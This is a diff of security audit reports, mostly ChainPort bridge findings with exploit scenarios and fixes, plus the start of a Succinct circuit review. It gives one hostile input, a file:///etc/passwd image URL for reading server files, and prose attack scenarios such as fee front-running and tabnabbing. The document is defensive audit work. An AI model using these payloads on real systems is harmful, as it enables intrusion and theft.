cover the $2,000 fee. She watches for the pending fee payment transaction and front-runs it to remove her PORTX from the ChainportFeeManager contract. Her transfer succeeds, but she is not required to pay the fee. Recommendations Short term, add an unbonding period preventing users from unstaking PORTX before the period has passed. Long term, ensure that deposit, transfer, and redemption operations are executed atomically with their corresponding fee payments. 16. Signature-related code lacks a proper specification and documentation Severity: Medium Difficulty: High Type: Cryptography Finding ID: TOB-CHPT-16 Target: Signature-related code Description ChainPort uses signatures to ensure that messages to mint and release tokens were generated by the back end. These signatures are not well documented, and the properties they attempt to provide are often unclear. For example, answers to the following questions are not obvious; we provide example answers that could be provided in the documentation of ChainPort’s use of signatures: ● Why does the signed message contain a networkId field, and why does it have to be unique? If not, an operation to mint tokens on one chain could be replayed on another chain. ● Why does the signed message contain an action field? The action field prevents replay attacks in networks that have both a main and side bridge. Without this field, a signature for minting tokens could be used on a sidechain contract of the same network to release tokens. ● Why are both the signature and nonce checked for uniqueness in the contracts? The signatures could be represented in more than one format, which means that storing them is not enough to ensure uniqueness. Recommendations Short term, create a specification describing what the signatures protect against, what properties they attempt to provide (e.g., integrity, non-repudiation), and how these properties are provided. 17. Cryptographic primitives lack sanity checks and clear function names Severity: Informational Difficulty: High Type: Cryptography Finding ID: TOB-CHPT-17 Target: chainport-backend/modules/cryptography_2key/signatures.py Description Several cryptographic primitives are missing sanity checks on their inputs. Without such checks, problems could occur if the primitives are used incorrectly. The remove_0x function (figure 17.1) does not check that the input starts with 0x. A similar function in the eth-utils library has a more robust implementation, as it includes a check on its input (figure 17.2). [REDACTED] Figure 17.1: chainport-backend/modules/cryptography_2key/signatures.py#L10-L16 [REDACTED] Figure 17.2: ethereum/eth-utils/eth_utils/hexadecimal.py#L43-L46 The add_leading_0 function's name does not indicate that the value is padded to a length of 64 (figure 17.3). [REDACTED] Figure 17.3: chainport-backend/modules/cryptography_2key/signatures.py#L19-L25 The _build_withdraw_message function does not ensure that the beneficiary_address and token_address inputs have the expected length of 66 bytes and that they start with 0x (figure 17.4). [REDACTED] Figure 17.4: chainport-backend/modules/cryptography_2key/signatures.py#L28-62 We did not identify problems in the way these primitives are currently used in the code, so we set the severity of this finding to informational. However, if the primitives are used improperly in the future, cryptographic bugs that can have severe consequences could be introduced, which is why we highly recommend fixing the issues described in this finding. Exploit Scenario A developer fails to understand the purpose of a function or receives an input from outside the system that has an unexpected format. Because the functions lack sanity checks, the code fails to do what the developer expected. This leads to a cryptographic vulnerability and the loss of funds. Recommendations Short term, add the missing checks and fix the naming issues described above. Where possible, use well-reviewed libraries rather than implementing cryptographic primitives in-house. Long term, review all the cryptographic primitives used in the codebase to ensure that the functions’ purposes are clear and that functions perform sanity checks, preventing them from being used improperly. Where necessary, add comments to describe the functions’ purposes. 18. Use of requests without the timeout argument Severity: Low Difficulty: High Type: Denial of Service Finding ID: TOB-CHPT-18 Target: The chainport-backend repository Description The Python requests library is used in the ChainPort back end without the timeout argument. By default, the requests library will wait until the connection is closed before fulfilling a request. Without the timeout argument, the program will hang indefinitely. The following locations in the back-end code are missing the timeout argument: ● chainport-backend/modules/coingecko/api.py#L29 ● chainport-backend/modules/requests_2key/requests.py#L14 ● chainport-backend/project/stats/cg_prices.py#L74 ● chainport-backend/project/stats/cg_prices.py#L95 The code in these locations makes requests to the following websites: ● https://api.coingecko.com ● https://ethgasstation.info ● https://gasstation-mainnet.matic.network If any of these websites hang indefinitely, so will the back-end code. Exploit Scenario One of the requested websites hangs indefinitely. This causes the back end to hang, and token ports from other users cannot be processed. Recommendations Short term, add the timeout argument to each of the code locations indicated above. This will ensure that the code will not hang if the website being requested hangs. Long term, integrate Semgrep into the CI pipeline to ensure that uses of the requests library always have the timeout argument. 19. Lack of noopener attribute on external links Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-19 Target: chainport-app/src/modules/exchange/components/PortOutModal.jsx Description In the ChainPort front-end application, there are links to external websites that have the target attribute set to _blank but lack the noopener attribute. Without this attribute, an attacker could perform a reverse tabnabbing attack. [REDACTED] Figure 19.1: chainport-app/src/modules/exchange/components/PortOutModal.jsx#L126 Exploit Scenario An attacker takes control of one of the external domains linked by the front end. The attacker prepares a malicious script on the domain that uses the window.opener variable to control the parent window’s location. A user clicks on the link in the ChainPort front end. The malicious website is opened in a new window, and the original ChainPort front end is seamlessly replaced by a phishing website. The victim then returns to a page that appears to be the original ChainPort front end but is actually a web page controlled by the attacker. The attacker tricks the user into transferring his funds to the attacker. Recommendations Short term, add the missing rel="noopener noreferrer" attribute to the anchor tags. References ● OWASP: Reverse tabnabbing attacks 20. Use of urllib could allow users to leak local files Severity: Undetermined Difficulty: High Type: Data Exposure Finding ID: TOB-CHPT-20 Target: chainport-backend/modules/infrastructure/aws/s3.py Description To upload images of new tokens to S3, the upload_media_from_url_to_s3 function uses the urllib library (figure 20.1), which supports the file:// scheme; therefore, if a malicious actor controls a dynamic value uploaded to S3, she could read arbitrary local files. [REDACTED] Figure 20.1: chainport-backend/modules/infrastructure/aws/s3.py#L25-29 The code in figure 20.2 replicates this issue. [REDACTED] Figure 20.2: Code to test urlopen’s support of the file:// scheme We set the severity of this finding to undetermined because it is unclear whether an attacker (e.g., a token owner) would have control over token images uploaded to S3 and whether the server holds files that an attacker would want to extract. Exploit Scenario A token owner makes the image of his token point to a local file (e.g., file:///etc/passwd). This local file is uploaded to the S3 bucket and is shown to an attacker attempting to port his own token into the ChainPort front end. The local file is leaked to the attacker. Recommendations Short term, use the requests library instead of urllib. The requests library does not support the file:// scheme. 21. The front end is vulnerable to iFraming Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-21 Target: The chainport-app repository Description The ChainPort front end does not prevent other websites from iFraming it. Figure 21.1 shows an example of how another website could iFrame the ChainPort front end. [REDACTED] Figure 21.1: An example of how another website could iFrame the ChainPort front end Exploit Scenario An attacker creates a website that iFrames ChainPort’s front end. The attacker performs a clickjacking attack to trick users into submitting malicious transactions. Recommendations Short term, add the X-Frame-Options: DENY header on every server response. This will prevent other websites from iFraming the ChainPort front end. 22. Lack of CSP header in the ChainPort front end Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-22 Target: The chainport-app repository Description The ChainPort front end lacks a Content Security Policy (CSP) header, leaving it vulnerable to cross-site scripting (XSS) attacks. A CSP header adds extra protection against XSS and data injection attacks by enabling developers to select the sources that the browser can execute or render code from. This safeguard requires the use of the CSP HTTP header and appropriate directives in every server response. Exploit Scenario An attacker finds an XSS vulnerability in the ChainPort front end and crafts a custom XSS payload. Because of the lack of a CSP header, the browser executes the attack, enabling the attacker to trick users into transferring their funds to him. Recommendations Short term, use a CSP header in the ChainPort front end and validate it with the CSP Evaluator. This will help mitigate the effects of XSS attacks. Long term, track the development of the CSP header and similar web browser features that help mitigate security risks. Ensure that new protections are adopted as quickly as possible. References ● HTTP Content Security Policy (CSP) ● Google CSP Evaluator ● Google Web Security Fundamentals: Eval ● Google Web Security Fundamentals: Inline code is considered harmful +3. Use of error-prone pattern for logging functions Severity: Low Difficulty: High Type: Auditing and Logging Finding ID: TOB-CHPT-3 Target: The chainport-backend repository Description The pattern shown in figure 3.1 is used repeatedly throughout the codebase to log function names. [REDACTED] Figure 3.1: An example of the pattern used by ChainPort to log function names This pattern is prone to copy-and-paste errors. Developers may copy the code from one function to another but forget to change the function name, as exemplified in figure 3.2. [REDACTED] Figure 3.2: An example of an incorrect use of the pattern used by ChainPort to log function names We wrote a Semgrep rule to detect these problems (appendix D). This rule detected 46 errors associated with this pattern in the back-end application. Figure 3.3 shows an example of one of these findings. [REDACTED] Figure 3.3: An example of one of the 46 errors resulting from the function-name logging pattern (chainport-backend/modules/web_3/helpers.py#L313-L315) Exploit Scenario A ChainPort developer is auditing the back-end application logs to determine the root cause of a bug. Because an incorrect function name was logged, the developer cannot correctly trace the application’s flow and determine the root cause in a timely manner. Recommendations Short term, use the Python decorator in figure 3.4 to log function names. This will eliminate the risk of copy-and-paste errors. [REDACTED] Figure 3.4: A Python decorator that logs function names, eliminating the risk of copy-and-paste errors Long term, review the codebase for other error-prone patterns. If such patterns are found, rewrite the code in a way that eliminates or reduces the risk of errors, and write a Semgrep rule to find the errors before the code hits production. +4. Use of hard-coded strings instead of constants Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-CHPT-4 Target: The chainport-backend repository Description The back-end code uses several hard-coded strings that could be defined as constants to prevent any typos from introducing vulnerabilities. For example, the checks that determine the system’s environment compare the result of the get_env function with the strings “develop”, “staging”, “prod”, or “local”. Figure 4.1 shows an example of one of these checks. [REDACTED] Figure 4.1: chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L42-L43 We did not find any typos in these literal strings, so we set the severity of this finding to informational. However, the use of hard-coded strings in place of constants is not best practice; we suggest fixing this issue and following other best practices for writing safe code to prevent the introduction of bugs in the future. Exploit Scenario A ChainPort developer creates code that should run only in the development build and safeguards it with the check in figure 4.2. [REDACTED] Figure 4.2: An example of a check against a hard-coded string that could lead to a vulnerability This test always fails—the correct value to test should have been “develop”. Now, the poorly tested, experimental code that was meant to run only in development mode is deployed in production. Recommendations Short term, create a constant for each of the four possible environments. Then, to check the system’s environment, import the corresponding constant and use it in the comparison instead of the hard-coded string. Alternatively, use an enum instead of a string to perform these comparisons. Long term, review the code for other instances of hard-coded strings where constants could be used instead. Create Semgrep rules to ensure that developers never use hard-coded strings where constants are available. +5. Use of incorrect operator in SQLAlchemy filter Severity: Undetermined Difficulty: Undetermined Type: Undefined Behavior Finding ID: TOB-CHPT-5 Target: chainport-backend/project/data/db/port.py#L173 Description The back-end code uses the is not operator in an SQLAlchemy query’s filter. SQLAlchemy relies on the __eq__ family of methods to apply the filter; however, the is and is not operators do not trigger these methods. Therefore, only the comparison operators (== or !=) should be used. [REDACTED] Figure 5.1: chainport-backend/project/data/db/port.py#L173 We did not review whether this flaw could be used to bypass the system’s business logic, so we set the severity of this issue to undetermined. Exploit Scenario An attacker exploits this flawed check to bypass the system’s business logic and steal user funds. Recommendations Short term, replace the is not operator with != in the filter indicated above. Long term, to continuously monitor the codebase for reintroductions of this issue, run the python.sqlalchemy.correctness.bad-operator-in-filter.bad-operator-in-f ilter Semgrep rule as part of the CI/CD flow. References ● SQLAlchemy: Common Filter Operators ● Stack Overflow: Select NULL Values in SQLAlchemy +6. Several functions receive the wrong number of arguments Severity: Undetermined Difficulty: Undetermined Type: Undefined Behavior Finding ID: TOB-CHPT-6 Target: The chainport-backend repository Description Several functions in the chainport-backend repository are called with an incorrect number of arguments: ● Several functions in the /project/deprecated_files folder ● A call to release_tokens_by_maintainer from the rebalance_bridge function (figures 6.1 and 6.2) ● A call to generate_redeem_signature from the regenerate_signature function (figures 6.3 and 6.4) ● A call to get_next_nonce_for_public_address from the prepare_erc20_transfer_transaction function (figures 6.5 and 6.6) ● A call to get_cg_token_address_list from the main function of the file (likely old debugging code) [REDACTED] Figure 6.1: The release_tokens_by_maintainer function is called with four arguments, but at least five are required. (chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L109-L1 14) [REDACTED] Figure 6.2: The definition of the release_tokens_by_maintainer function (chainport-backend/project/lambdas/release_tokens_by_maintainer.py#L27-L3 4) [REDACTED] Figure 6.3: A call to generate_redeem_signature that is missing the network_id argument (chainport-backend/project/scripts/keys_maintainers_signature/regenerate_ signature.py#L38-L43) [REDACTED] Figure 6.4: The definition of the generate_redeem_signature function (chainport-backend/project/lambdas/sidechain/events_handlers/handle_burn_ event.py#L46-L48) [REDACTED] Figure 6.5: A call to get_next_nonce_for_public_address that is missing the outer_session argument (chainport-backend/project/web3_cp/erc20/prepare_erc20_transfer_transacti on.py#L32-L34) [REDACTED] Figure 6.6: The definition of the get_next_nonce_for_public_address function (chainport-backend/project/web3_cp/nonce.py#L19-L21) [REDACTED] Figure 6.7: A call to get_cg_token_address_list that is missing all three arguments (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L90-91) [REDACTED] Figure 6.8: The definition of the get_cg_token_address_list function (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L37) We did not review whether this flaw could be used to bypass the system’s business logic, so we set the severity of this issue to undetermined. Exploit Scenario The release_tokens_by_maintainer function is called from the rebalance_bridge function with the incorrect number of arguments. As a result, the rebalance_bridge function fails if the token balance is over the threshold limit, and the tokens are not moved to a safe address. An attacker finds another flaw and is able to steal more tokens than he would have been able to if the tokens were safely stored in another account. Recommendations Short term, fix the errors presented in the description of this finding by adding the missing arguments to the function calls. Long term, run pylint or a similar static analysis tool to detect these problems (and others) before the code is committed and deployed in production. This will ensure that if the list of a function’s arguments ever changes (which was likely the root cause of this problem), a call that does not match the new arguments will be flagged before the code is deployed. +7. Lack of events for critical operations Severity: Informational Difficulty: High Type: Auditing and Logging Finding ID: TOB-CHPT-7 Target: ChainportMainBridge.sol, ChainportSideBridge.sol, Validator.sol, Description Several critical operations do not trigger events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. For example, the setSignatoryAddress function, which is called in the Validator contract to set the signatory address, does not emit an event providing confirmation of that operation to the contract’s caller (figure 7.1). [REDACTED] Figure 7.1: The setSignatoryAddress function in Validator:43-52 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to compromise a quorum of the ChainPort congress voters contract. She then sets a new signatory address. Alice, a ChainPort team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components. +8. Lack of zero address checks in setter functions Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-CHPT-8 Target: ChainportMainBridge.sol, ChainportMiddleware.sol, ChainportSideBridge.sol Description Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. For example, in the initialize function of the ChainportMainBridge contract, developers can define the maintainer registry, the congress address for governance, and the signature validator and set their addresses to the zero address. [REDACTED] Figure 8.1: The initialize function of ChainportMainBridge.sol Failure to immediately reset an address that has been set to the zero address could result in unexpected behavior. Exploit Scenario Alice accidentally sets the ChainPort congress address to the zero address when initializing a new version of the ChainportMainBridge contract. The misconfiguration causes the system to behave unexpectedly, and the system must be redeployed once the misconfiguration is detected. Recommendations Short term, add zero-value checks to all constructor functions and for all setter arguments to ensure that users cannot accidentally set incorrect values, misconfiguring the system. Document any arguments that are intended to be set to the zero address, highlighting the expected values of those arguments on each chain. Long term, use the Slither static analyzer to catch common issues such as this one. Consider integrating a Slither scan into the project’s CI pipeline, pre-commit hooks, or build scripts. +9. Python type annotations are missing from most functions Severity: Low Difficulty: High Type: Undefined Behavior Finding ID: TOB-CHPT-9 Target: The chainport-backend repository Description The back-end code uses Python type annotations; however, their use is sporadic, and most functions are missing them. Exploit Scenario The cg_rest_call function receives the exception argument without specifying its type with a Python type annotation. The get_token_details_by_cg_id function calls cg_rest_call with an object of the incorrect type, an Exception instance instead of an Exception class, causing the program to crash (figure 9.1). [REDACTED] Figure 9.1: chainport-backend/modules/coingecko/api.py#L41-L42 Recommendations Short term, add type annotations to the arguments of every function. This will not prevent the code from crashing or causing undefined behavior during runtime; however, it will allow developers to clearly see each argument’s expected type and static analyzers to better detect type mismatches. Long term, implement checks in the CI/CD pipeline to ensure that code without type annotations is not accepted. +10. Use of libraries with known vulnerabilities Severity: Low Difficulty: Low Type: Patching Finding ID: TOB-CHPT-10 Target: The chainport-backend repository Description The back-end repository uses outdated libraries with known vulnerabilities. We used pip-audit, a tool developed by with support from Google to audit Python environments and dependency trees for known vulnerabilities, and identified two known vulnerabilities in the project’s dependencies (as shown in figure 10.1). [REDACTED] Figure 10.1: A list of outdated libraries in the back-end repository Recommendations Short term, update the project’s dependencies to their latest versions wherever possible. Use pip-audit to confirm that no vulnerable dependencies remain. Long term, add pip-audit to the project’s CI/CD pipeline. Do not allow builds to succeed with dependencies that have known vulnerabilities. +11. Use of JavaScript instead of TypeScript Severity: Low Difficulty: Low Type: Configuration Finding ID: TOB-CHPT-11 Target: The chainport-app repository Description The ChainPort front end is developed with JavaScript instead of TypeScript. TypeScript is a strongly typed language that compiles to JavaScript. It allows developers to specify the types of variables and function arguments, and TypeScript code will fail to compile if there are type mismatches. Contrarily, JavaScript code will crash (or worse) during runtime if there are type mismatches. In summary, TypeScript is preferred over JavaScript for the following reasons: ● It improves code readability; developers can easily identify variable types and the types that functions receive. ● It improves security by providing static type checking that catches errors during compilation. ● It improves support for integrated development environments (IDEs) and other tools by allowing them to reason about the types of variables. Exploit Scenario A bug in the front-end application is missed, and the code is deployed in production. The bug causes the application to crash, preventing users from using it. This bug would have been caught if the front-end application were written in TypeScript. Recommendations Short term, rewrite newer parts of the application in TypeScript. TypeScript can be used side-by-side with JavaScript in the same application, allowing it to be introduced gradually. Long term, gradually rewrite the whole application in TypeScript. +12. Use of .format to create SQL queries Severity: Informational Difficulty: Medium Type: Data Validation Finding ID: TOB-CHPT-12 Target: [REDACTED] Description The back end builds SQL queries with the .format function. An attacker that controls one of the variables that the function is formatting will be able to inject SQL code to steal information or damage the database. [REDACTED] Figure 12.1: chainport-backend/project/data/db/postgres.py#L4-L24 [REDACTED] Figure 12.2: chainport-backend/project/lambdas/database_monitor/clear_lock.py#L29-L31 None of the fields described above are attacker-controlled, so we set the severity of this finding to informational. However, the use of .format to create SQL queries is an anti-pattern; parameterized queries should be used instead. Exploit Scenario A developer copies the vulnerable code to create a new SQL query. This query receives an attacker-controlled string. The attacker conducts a time-based SQL injection attack, leaking the whole database. Recommendations Short term, use parameterized queries instead of building strings with variables by hand. Long term, create or use a static analysis check that forbids this pattern. This will ensure that this pattern is never reintroduced by a less security-aware developer. +13. Many rules are disabled in the ESLint configuration Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-CHPT-13 Target: chainport-app/.eslintrc.js Description There are 34 rules disabled in the front-end eslint configuration. Disabling some of these rules does not cause problems, but disabling others reduces the code’s security and reliability (e.g., react/no-unescaped-entities, consistent-return, no-shadow) and the code’s readability (e.g., react/jsx-boolean-value, react/jsx-one-expression-per-line). Furthermore, the code contains 46 inline eslint-disable comments to disable specific rules. While disabling some of these rules in this way may be valid, we recommend adding a comment to each instance explaining why the specific rule was disabled. Recommendations Short term, create a list of rules that can be safely disabled without reducing the code’s security or readability, document the justification, and enable every other rule. Fix any findings that these rules may report. For rules that are disabled with inline eslint-disable comments, include explanatory comments justifying why they are disabled. +14. Congress can lose quorum after manually setting the quorum value Severity: Medium Difficulty: High Type: Configuration Finding ID: TOB-CHPT-14 Target: contracts/governance/ChainportCongressMembersRegistry.sol Description Proposals to the ChainPort congress must be approved by a minimum quorum of members before they can be executed. By default, when a new member is added to the congress, the quorum is updated to be N − 1, where N is the number of congress members. [REDACTED] Figure 14.1: smart-contracts/contracts/governance/ChainportCongressMembersRegistry.so l#L98-L119 However, the congress has the ability to overwrite the quorum number to any nonzero number, including values larger than the current membership. [REDACTED] Figure 14.2: smart-contracts//contracts/governance/ChainportCongressMembersRegistry.s ol#L69-L77 If the congress manually lowers the quorum number and later adds a member, the quorum number will be reset to one less than the total membership. If for some reason certain members are temporarily or permanently unavailable (e.g., they are on vacation or their private keys were destroyed), the minimum quorum would not be reached. Exploit Scenario The ChainPort congress is composed of 10 members. Alice submits a proposal to reduce the minimum quorum to six members to ensure continuity while several members take vacations over a period of several months. During this period, a proposal to add Bob as a new member of the ChainPort congress is passed while Carol and Dave, two other congress members, are on vacation. This unexpectedly resets the minimum quorum to 10 members of the 11-person congress, preventing new proposals from being passed. Recommendations Short term, rewrite the code so that, when a new member is added to the congress, the minimum quorum number increases by one rather than being updated to the current number of congress members subtracted by one. Add a cap to the minimum quorum number to prevent it from being manually set to values larger than the current membership of the congress. Long term, uncouple operations for increasing and decreasing quorum values from operations for making congress membership changes. Instead, require that such operations be included as additional actions in proposals for membership changes. +15. Potential race condition could allow users to bypass PORTX fee payments Severity: Low Type: Timing Difficulty: Medium Finding ID: TOB-CHPT-15 Target: contracts/ChainportFeeManager.sol Description ChainPort fees are paid either as a 0.3% fee deducted from the amount transferred or as a 0.2% fee in PORTX tokens that the user has deposited into the ChainportFeeManager contract. To determine whether a fee should be paid in the base token or in PORTX, the back end checks whether the user has a sufficient PORTX balance in the ChainportFeeManager contract. [REDACTED] Figure 15.1: chainport-backend//project/lambdas/fees/fees.py#L219-249 However, the ChainportFeeManager contract does not enforce an unbonding period, a period of time before users can unstake their PORTX tokens. [REDACTED] Figure 15.2: smart-contracts/contracts/ChainportFeeManager.sol#L113-L125 Since pending fee payments are generated as part of deposit, transfer, and burn events but the actual processing is handled by a separate monitor, it could be possible for a user to withdraw her PORTX tokens on-chain after the deposit event has been processed and before the fee payment transaction is confirmed, allowing her to avoid paying a fee for the transfer. Exploit Scenario Alice uses ChainPort to bridge one million USDC from the Ethereum mainnet to Polygon. She has enough PORTX deposited in the ChainportFeeManager contract to cover the $2,000 fee. She watches for the pending fee payment transaction and front-runs it to remove her PORTX from the ChainportFeeManager contract. Her transfer succeeds, but she is not required to pay the fee. Recommendations Short term, add an unbonding period preventing users from unstaking PORTX before the period has passed. Long term, ensure that deposit, transfer, and redemption operations are executed atomically with their corresponding fee payments. +16. Signature-related code lacks a proper specification and documentation Severity: Medium Difficulty: High Type: Cryptography Finding ID: TOB-CHPT-16 Target: Signature-related code Description ChainPort uses signatures to ensure that messages to mint and release tokens were generated by the back end. These signatures are not well documented, and the properties they attempt to provide are often unclear. For example, answers to the following questions are not obvious; we provide example answers that could be provided in the documentation of ChainPort’s use of signatures: ● Why does the signed message contain a networkId field, and why does it have to be unique? If not, an operation to mint tokens on one chain could be replayed on another chain. ● Why does the signed message contain an action field? The action field prevents replay attacks in networks that have both a main and side bridge. Without this field, a signature for minting tokens could be used on a sidechain contract of the same network to release tokens. ● Why are both the signature and nonce checked for uniqueness in the contracts? The signatures could be represented in more than one format, which means that storing them is not enough to ensure uniqueness. Recommendations Short term, create a specification describing what the signatures protect against, what properties they attempt to provide (e.g., integrity, non-repudiation), and how these properties are provided. +17. Cryptographic primitives lack sanity checks and clear function names Severity: Informational Difficulty: High Type: Cryptography Finding ID: TOB-CHPT-17 Target: chainport-backend/modules/cryptography_2key/signatures.py Description Several cryptographic primitives are missing sanity checks on their inputs. Without such checks, problems could occur if the primitives are used incorrectly. The remove_0x function (figure 17.1) does not check that the input starts with 0x. A similar function in the eth-utils library has a more robust implementation, as it includes a check on its input (figure 17.2). [REDACTED] Figure 17.1: chainport-backend/modules/cryptography_2key/signatures.py#L10-L16 [REDACTED] Figure 17.2: ethereum/eth-utils/eth_utils/hexadecimal.py#L43-L46 The add_leading_0 function's name does not indicate that the value is padded to a length of 64 (figure 17.3). [REDACTED] Figure 17.3: chainport-backend/modules/cryptography_2key/signatures.py#L19-L25 The _build_withdraw_message function does not ensure that the beneficiary_address and token_address inputs have the expected length of 66 bytes and that they start with 0x (figure 17.4). [REDACTED] Figure 17.4: chainport-backend/modules/cryptography_2key/signatures.py#L28-62 We did not identify problems in the way these primitives are currently used in the code, so we set the severity of this finding to informational. However, if the primitives are used improperly in the future, cryptographic bugs that can have severe consequences could be introduced, which is why we highly recommend fixing the issues described in this finding. Exploit Scenario A developer fails to understand the purpose of a function or receives an input from outside the system that has an unexpected format. Because the functions lack sanity checks, the code fails to do what the developer expected. This leads to a cryptographic vulnerability and the loss of funds. Recommendations Short term, add the missing checks and fix the naming issues described above. Where possible, use well-reviewed libraries rather than implementing cryptographic primitives in-house. Long term, review all the cryptographic primitives used in the codebase to ensure that the functions’ purposes are clear and that functions perform sanity checks, preventing them from being used improperly. Where necessary, add comments to describe the functions’ purposes. +18. Use of requests without the timeout argument Severity: Low Difficulty: High Type: Denial of Service Finding ID: TOB-CHPT-18 Target: The chainport-backend repository Description The Python requests library is used in the ChainPort back end without the timeout argument. By default, the requests library will wait until the connection is closed before fulfilling a request. Without the timeout argument, the program will hang indefinitely. The following locations in the back-end code are missing the timeout argument: ● chainport-backend/modules/coingecko/api.py#L29 ● chainport-backend/modules/requests_2key/requests.py#L14 ● chainport-backend/project/stats/cg_prices.py#L74 ● chainport-backend/project/stats/cg_prices.py#L95 The code in these locations makes requests to the following websites: ● https://api.coingecko.com ● https://ethgasstation.info ● https://gasstation-mainnet.matic.network If any of these websites hang indefinitely, so will the back-end code. Exploit Scenario One of the requested websites hangs indefinitely. This causes the back end to hang, and token ports from other users cannot be processed. Recommendations Short term, add the timeout argument to each of the code locations indicated above. This will ensure that the code will not hang if the website being requested hangs. Long term, integrate Semgrep into the CI pipeline to ensure that uses of the requests library always have the timeout argument. +19. Lack of noopener attribute on external links Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-19 Target: chainport-app/src/modules/exchange/components/PortOutModal.jsx Description In the ChainPort front-end application, there are links to external websites that have the target attribute set to _blank but lack the noopener attribute. Without this attribute, an attacker could perform a reverse tabnabbing attack. [REDACTED] Figure 19.1: chainport-app/src/modules/exchange/components/PortOutModal.jsx#L126 Exploit Scenario An attacker takes control of one of the external domains linked by the front end. The attacker prepares a malicious script on the domain that uses the window.opener variable to control the parent window’s location. A user clicks on the link in the ChainPort front end. The malicious website is opened in a new window, and the original ChainPort front end is seamlessly replaced by a phishing website. The victim then returns to a page that appears to be the original ChainPort front end but is actually a web page controlled by the attacker. The attacker tricks the user into transferring his funds to the attacker. Recommendations Short term, add the missing rel="noopener noreferrer" attribute to the anchor tags. References ● OWASP: Reverse tabnabbing attacks +20. Use of urllib could allow users to leak local files Severity: Undetermined Difficulty: High Type: Data Exposure Finding ID: TOB-CHPT-20 Target: chainport-backend/modules/infrastructure/aws/s3.py Description To upload images of new tokens to S3, the upload_media_from_url_to_s3 function uses the urllib library (figure 20.1), which supports the file:// scheme; therefore, if a malicious actor controls a dynamic value uploaded to S3, she could read arbitrary local files. [REDACTED] Figure 20.1: chainport-backend/modules/infrastructure/aws/s3.py#L25-29 The code in figure 20.2 replicates this issue. [REDACTED] Figure 20.2: Code to test urlopen’s support of the file:// scheme We set the severity of this finding to undetermined because it is unclear whether an attacker (e.g., a token owner) would have control over token images uploaded to S3 and whether the server holds files that an attacker would want to extract. Exploit Scenario A token owner makes the image of his token point to a local file (e.g., file:///etc/passwd). This local file is uploaded to the S3 bucket and is shown to an attacker attempting to port his own token into the ChainPort front end. The local file is leaked to the attacker. Recommendations Short term, use the requests library instead of urllib. The requests library does not support the file:// scheme. +21. The front end is vulnerable to iFraming Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-21 Target: The chainport-app repository Description The ChainPort front end does not prevent other websites from iFraming it. Figure 21.1 shows an example of how another website could iFrame the ChainPort front end. [REDACTED] Figure 21.1: An example of how another website could iFrame the ChainPort front end Exploit Scenario An attacker creates a website that iFrames ChainPort’s front end. The attacker performs a clickjacking attack to trick users into submitting malicious transactions. Recommendations Short term, add the X-Frame-Options: DENY header on every server response. This will prevent other websites from iFraming the ChainPort front end. +22. Lack of CSP header in the ChainPort front end Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-22 Target: The chainport-app repository Description The ChainPort front end lacks a Content Security Policy (CSP) header, leaving it vulnerable to cross-site scripting (XSS) attacks. A CSP header adds extra protection against XSS and data injection attacks by enabling developers to select the sources that the browser can execute or render code from. This safeguard requires the use of the CSP HTTP header and appropriate directives in every server response. Exploit Scenario An attacker finds an XSS vulnerability in the ChainPort front end and crafts a custom XSS payload. Because of the lack of a CSP header, the browser executes the attack, enabling the attacker to trick users into transferring their funds to him. Recommendations Short term, use a CSP header in the ChainPort front end and validate it with the CSP Evaluator. This will help mitigate the effects of XSS attacks. Long term, track the development of the CSP header and similar web browser features that help mitigate security risks. Ensure that new protections are adopted as quickly as possible. References ● HTTP Content Security Policy (CSP) ● Google CSP Evaluator ● Google Web Security Fundamentals: Eval ● Google Web Security Fundamentals: Inline code is considered harmful diff --git a/findings_newupdate/2023-02-ryanshea-practicalstealthaddresses-securityreview.txt b/findings_newupdate/tob/2023-02-ryanshea-practicalstealthaddresses-securityreview.txt similarity index 100% rename from findings_newupdate/2023-02-ryanshea-practicalstealthaddresses-securityreview.txt rename to findings_newupdate/tob/2023-02-ryanshea-practicalstealthaddresses-securityreview.txt diff --git a/findings_newupdate/2023-02-solana-token-2022-program-securityreview.txt b/findings_newupdate/tob/2023-02-solana-token-2022-program-securityreview.txt similarity index 100% rename from findings_newupdate/2023-02-solana-token-2022-program-securityreview.txt rename to findings_newupdate/tob/2023-02-solana-token-2022-program-securityreview.txt diff --git a/findings_newupdate/tob/2023-02-succinct-securityreview.txt b/findings_newupdate/tob/2023-02-succinct-securityreview.txt new file mode 100644 index 0000000..e0e0e40 --- /dev/null +++ b/findings_newupdate/tob/2023-02-succinct-securityreview.txt @@ -0,0 +1,14 @@ +1. Prover can lock user funds by including ill-formed BigInts in public key commitment Severity: High Difficulty: Low Type: Data Validation Finding ID: TOB-SUCCINCT-1 Target: circuits/circuits/rotate.circom Description The Rotate circuit does not check for the validity of BigInts included in pubkeysBigIntY . A malicious prover can lock user funds by carefully selecting malformed public keys and using the Rotate function, which will prevent future provers from using the default witness generator to make new proofs. The Rotate circuit is designed to prove a translation between an SSZ commitment over a set of validator public keys produced by the Ethereum consensus protocol and a Poseidon commitment over an equivalent list. The SSZ commitment is over public keys serialized as 48-byte compressed BLS public keys, specifying an X coordinate and single sign bit, while the Poseidon commitment is over pairs (X, Y) , where X and Y are 7-limb, 55-bit BigInts. The prover specifies the Y coordinate for each public key as part of the witness; the Rotate circuit then uses SubgroupCheckG1WithValidX to constrain Y to be valid in the sense that (X, Y) is a point on the BLS12-381 elliptic curve. However, SubgroupCheckG1WithValidX assumes that its input is a properly formed BigInt, with all 